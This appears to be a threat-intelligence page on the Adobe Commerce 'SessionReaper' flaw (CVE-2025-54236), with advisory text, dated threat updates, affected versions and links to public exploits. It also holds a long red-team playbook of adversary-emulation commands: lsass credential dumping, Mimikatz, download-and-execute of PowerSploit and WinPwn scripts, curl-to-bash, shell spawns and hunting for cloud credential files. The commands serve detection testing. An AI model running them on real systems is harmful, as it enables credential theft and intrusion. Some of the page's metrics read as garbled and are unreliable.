CVE-2025-54236
Overview
This vulnerability is an improper input validation flaw in Adobe Commerce affecting the customer address file upload functionality. The root cause lies in insufficient sanitization and validation of multipart form data parameters, specifically in the handling of the 'custom_attributes[country_id]' field within the POST /customer/address_file/upload endpoint. This allows crafted input to bypass intended security checks, impacting session management components responsible for user authentication tokens.
Vulnerability Description
Adobe Commerce versions 2.4.9-alpha2, 2.4.8-p2, 2.4.7-p7, 2.4.6-p12, 2.4.5-p14, 2.4.4-p15 and earlier are affected by an Improper Input Validation vulnerability. A successful attacker can abuse this to achieve session takeover, increasing the confidentiality, and integrity impact to high. Exploitation of this issue does not require user interaction.
Impact
An unauthenticated attacker can exploit this vulnerability to perform session takeover, gaining unauthorized access to user accounts without requiring any user interaction. This compromises the confidentiality and integrity of user data, allowing attackers to impersonate legitimate users and potentially manipulate sensitive information. The exploitability is high due to the lack of authentication or user action prerequisites, increasing the risk of data breaches and unauthorized access within affected Adobe Commerce environments.
Solution
Adobe has released security updates addressing this issue in Adobe Commerce versions 2.4.9 and later. Users should apply the patches described in the Adobe Security Bulletin APSB25-88 available at https://helpx.adobe.com/security/products/magento/apsb25-88.html. The advisory provides detailed instructions for upgrading affected versions and confirms the resolution of the improper input validation vulnerability in the customer address file upload component.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in Adobe Commerce, characterized by improper input validation, presents a significant risk to the integrity and confidentiality of user sessions. This flaw arises when the application fails to adequately validate user inputs, allowing attackers to manipulate data in a way that can lead to unauthorized access. Specifically, the vulnerability can facilitate session takeover, where an attacker can hijack a legitimate user's session without requiring any interaction from the victim. This lack of user interaction not only increases the potential for exploitation but also makes it more challenging for users to recognize that their session has been compromised.
Attackers can exploit this vulnerability through various vectors, primarily by crafting malicious requests that bypass input validation checks. For instance, they could use automated scripts to send specially crafted payloads that exploit the flawed validation mechanisms. Once the attacker successfully takes over a session, they can impersonate the legitimate user, gaining access to sensitive information, performing unauthorized transactions, or altering user data. The ease of exploitation, combined with the high potential impact, underscores the urgency for organizations using affected versions of Adobe Commerce to address this vulnerability promptly.
The real-world implications of this vulnerability are severe, particularly for businesses that rely on Adobe Commerce for their e-commerce operations. A successful session takeover can lead to data breaches, financial losses, and damage to a company's reputation. Customers may lose trust in the organization, leading to decreased sales and long-term financial repercussions. Additionally, regulatory bodies may impose fines if sensitive customer data is compromised, further exacerbating the financial impact. The high CVSS score of 9.1 reflects the critical nature of this vulnerability, highlighting the necessity for immediate action to mitigate risks.
To effectively detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating to the latest versions of Adobe Commerce is crucial, as patches often address known vulnerabilities. Additionally, employing web application firewalls (WAFs) can help filter out malicious traffic and block attempts to exploit the vulnerability. Security teams should also conduct regular security assessments and penetration testing to identify and remediate potential weaknesses in their systems. Educating users about the importance of secure session management and implementing strong authentication mechanisms can further reduce the risk of session hijacking.
In conclusion, the improper input validation vulnerability in Adobe Commerce poses a significant threat to both the security of user sessions and the overall integrity of business operations. Given the ease of exploitation and the potential for severe consequences, organizations must prioritize the detection and remediation of this issue. By adopting proactive security measures and fostering a culture of security awareness, businesses can better protect themselves against the risks associated with this vulnerability and maintain the trust of their customers.
CSURFACE threat intelligence has identified a significant increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2025-54236, rising by over 20% to a current level placing it in the 0.99th percentile. This escalation is notable despite a marked reduction in detection activity reported by our sensors, indicating that while direct exploit attempts may be less frequently observed, the overall likelihood and ease of exploitation have increased. This paradox is explained by the recent emergence of multiple new proof-of-concept exploit tools publicly available on GitHub, which lower the barrier for threat actors to weaponize this vulnerability. The expanded exploit landscape suggests that adversaries can more readily develop or customize attacks, potentially leading to a broader range of exploitation scenarios beyond what has been previously seen. Although no confirmed ransomware campaigns have been linked to this vulnerability, the association with the Storm-0501 group remains under observation, warranting continued vigilance. Collectively, these developments elevate the threat level by increasing the probability of successful session takeover attacks, which could severely impact confidentiality and integrity in affected Adobe Commerce environments. Defenders should interpret this as a heightened risk environment where exploitation is more accessible, even if active exploitation attempts are not currently surging.
Update 2 — June 20, 2026
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2025-54236, with telemetry indicating a notable increase in exploitation attempts and a significant rise in the Exploit Prediction Scoring System (EPSS) score. This upward trend reflects growing adversary interest and capability to leverage the improper input validation flaw for session takeover in Adobe Commerce environments. The emergence of multiple new proof-of-concept exploits publicly available on code-sharing platforms further lowers the barrier for threat actors to operationalize this vulnerability. Although ransomware campaigns remain unconfirmed, the persistent association with the Storm-0501 group underscores the potential for this vulnerability to be weaponized in future targeted intrusions. Collectively, these developments elevate the threat landscape, signaling a higher likelihood of successful exploitation that could severely compromise confidentiality and integrity. Defenders should recognize this as a heightened risk scenario where exploitation attempts may become more frequent and sophisticated, warranting increased vigilance and prioritization in threat monitoring.
Update 3 — July 09, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation activity targeting CVE-2025-54236, accompanied by the emergence of several new proof-of-concept tools that lower the barrier for adversaries to conduct session takeover attacks. Our telemetry indicates a sustained upward trend in detection signals, reflecting broader adversary interest and operationalization of this vulnerability. While the EPSS score remains stable, the expanded exploit landscape and increased detection frequency collectively elevate the practical risk of compromise. Notably, the continued association with the Storm-0501 group underscores a persistent threat actor interest that could translate into more targeted and sophisticated intrusion attempts. This evolving environment signals that defenders should anticipate more frequent exploitation attempts with potentially higher success rates, thereby increasing the urgency for robust monitoring and response capabilities.
Affected Products (152)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Adobe | Commerce | 2.4.4 |
cpe:2.3:a:adobe:commerce:2.4.4:-:*:*:*:*:*:*
|
|
|
Adobe | Commerce | 2.4.4 |
cpe:2.3:a:adobe:commerce:2.4.4:p1:*:*:*:*:*:*
|
|
|
Adobe | Commerce | 2.4.4 |
cpe:2.3:a:adobe:commerce:2.4.4:p10:*:*:*:*:*:*
|
|
|
Adobe | Commerce | 2.4.4 |
cpe:2.3:a:adobe:commerce:2.4.4:p11:*:*:*:*:*:*
|
|
|
Adobe | Commerce | 2.4.4 |
cpe:2.3:a:adobe:commerce:2.4.4:p12:*:*:*:*:*:*
|
|
|
Adobe | Commerce | 2.4.4 |
cpe:2.3:a:adobe:commerce:2.4.4:p13:*:*:*:*:*:*
|
|
|
Adobe | Commerce | 2.4.4 |
cpe:2.3:a:adobe:commerce:2.4.4:p14:*:*:*:*:*:*
|
|
|
Adobe | Commerce | 2.4.4 |
cpe:2.3:a:adobe:commerce:2.4.4:p15:*:*:*:*:*:*
|
|
|
Adobe | Commerce | 2.4.4 |
cpe:2.3:a:adobe:commerce:2.4.4:p2:*:*:*:*:*:*
|
|
|
Adobe | Commerce | 2.4.4 |
cpe:2.3:a:adobe:commerce:2.4.4:p3:*:*:*:*:*:*
|
|
|
Adobe | Commerce | 2.4.4 |
cpe:2.3:a:adobe:commerce:2.4.4:p4:*:*:*:*:*:*
|
|
|
Adobe | Commerce | 2.4.4 |
cpe:2.3:a:adobe:commerce:2.4.4:p5:*:*:*:*:*:*
|
|
|
Adobe | Commerce | 2.4.4 |
cpe:2.3:a:adobe:commerce:2.4.4:p6:*:*:*:*:*:*
|
|
|
Adobe | Commerce | 2.4.4 |
cpe:2.3:a:adobe:commerce:2.4.4:p7:*:*:*:*:*:*
|
|
|
Adobe | Commerce | 2.4.4 |
cpe:2.3:a:adobe:commerce:2.4.4:p8:*:*:*:*:*:*
|
|
|
Adobe | Commerce | 2.4.4 |
cpe:2.3:a:adobe:commerce:2.4.4:p9:*:*:*:*:*:*
|
|
|
Adobe | Commerce | 2.4.5 |
cpe:2.3:a:adobe:commerce:2.4.5:-:*:*:*:*:*:*
|
|
|
Adobe | Commerce | 2.4.5 |
cpe:2.3:a:adobe:commerce:2.4.5:p1:*:*:*:*:*:*
|
|
|
Adobe | Commerce | 2.4.5 |
cpe:2.3:a:adobe:commerce:2.4.5:p10:*:*:*:*:*:*
|
|
|
Adobe | Commerce | 2.4.5 |
cpe:2.3:a:adobe:commerce:2.4.5:p11:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Magento SessionReaper
exploits/multi/http/magento_sessionreaper
|
Blaklis, Tomais Williamson | Unknown | - | View |
GitHub PoCs (7)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
wubinworks/magento2-session-reaper-patch
Patch for CVE-2025-54236(a.k.a Session Reaper) which allows customer account takeover and RCE under certain conditions. ...
|
wubinworks | 3 | 0 | 2025-10-19 | View |
|
alexb616/SessionReaper-CVE-2025-54236
PoC Magento Session Reaper - CVE-2025-54236
|
alexb616 | 1 | 0 | 2026-03-19 | View |
|
Dx3iZ/CVE-2025-54236
Adobe Magento SessionReaper LFI Vulnerability
|
Dx3iZ | 0 | 0 | 2026-07-06 | View |
|
brito101/session_reaper_lab
Ambiente Docker para demonstração prática da CVE-2025-54236 (SessionReaper): PHP Object Deserialization levando a RCE em...
|
brito101 | 0 | 0 | 2026-05-24 | View |
|
Jenderal92/magento-upload-auto-submit-zoneh
SessionReaper-CVE-2025-54236
|
Jenderal92 | 0 | 0 | 2026-05-13 | View |
|
Baba01hacker666/cve-2025-54236
cve-2025-54236 poc
|
Baba01hacker666 | 0 | 0 | 2025-12-30 | View |
|
amalpvatayam67/day01-sessionreaper-lab
This is a tiny lab that simulates the core idea reported for CVE-2025-54236 (“SessionReaper”)
|
amalpvatayam67 | 0 | 0 | 2025-09-10 | View |
Threat Feed
18 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Deployed role: Linux · Web Server
Kill chain derived from the ML classifier. Pick the target OS above to see the OS-specific path and matching playbook.
Attack Vectors ML
MITRE ATT&CK Techniques (10)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
108 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-54236 |
| helpx.adobe.com |
GitHub CVE
vendor-advisory
|
https://helpx.adobe.com/security/products/magento/apsb25-88.html |
| experienceleague.adobe.com |
NVD API
Vendor Advisory
|
https://experienceleague.adobe.com/en/docs/experience-cloud-kcs/kbarticles/ka-27397 |
| nullsecurityx.codes |
NVD API
Broken Link
Exploit
Third Party Advisory
|
https://nullsecurityx.codes/cve-2025-54236-sessionreaper-unauthenticated-rce-in-magento |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-54236 |